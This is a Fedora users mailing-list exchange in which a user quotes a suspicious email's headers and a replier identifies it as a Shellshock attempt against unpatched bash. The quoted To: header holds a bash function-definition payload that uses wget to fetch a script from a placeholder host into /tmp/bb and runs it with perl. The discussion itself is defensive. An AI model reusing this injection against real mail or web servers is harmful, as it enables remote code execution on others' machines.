On 7 October 2014 00:07, Bill Oliver <vendor@xxxxxxxxxxxxx> wrote: > > First, I apologize for this not being fedora-specific, but I just got > the oddest email. It looks like an intrusion attempt, trying to get > sendmail to execute a perl script. Is anybody familiar with this > particular pattern? > > The email is below. > > > Return-Path: <MAILER-DAEMON@xxxxxxxxxxxxx> > Received: from incenclick.com (incenclick.com [184.95.45.61] (may be > forged)) > by hope.billoblog.com (8.14.4/8.14.4) with SMTP id s96FKVOY029890 > for <nobody>; Mon, 6 Oct 2014 15:20:31 GMT > Resent-Message-Id: <201410061520.s96FKVOY029890@xxxxxxxxxxxxxxxxxx> > X-Authentication-Warning: hope.billoblog.com: incenclick.com > [184.95.45.61] (may be forged) didn't use HELO protocol > To:() { > :;;};wget.http://YOUREXPLOITHERE.-O/tmp/bb;perl/tmp/bb@xxxxxxxxxxxxxxxxxx;; etc. If you had to guess what exploit of the month was going to be what would you say ;) This is someone hoping there's a mail client or server somewhere (and maybe there is) that will load those headers into environment variables and shell out, causing unpatched bash to download and run a script. -- imalone http://ibmalone.blogspot.co.uk -- users mailing list users@xxxxxxxxxxxxxxxxxxxxxxx To unsubscribe or change subscription options: https://admin.fedoraproject.org/mailman/listinfo/users Fedora Code of Conduct: http://fedoraproject.org/code-of-conduct Guidelines: http://fedoraproject.org/wiki/Mailing_list_guidelines Have a question? Ask away: http://ask.fedoraproject.org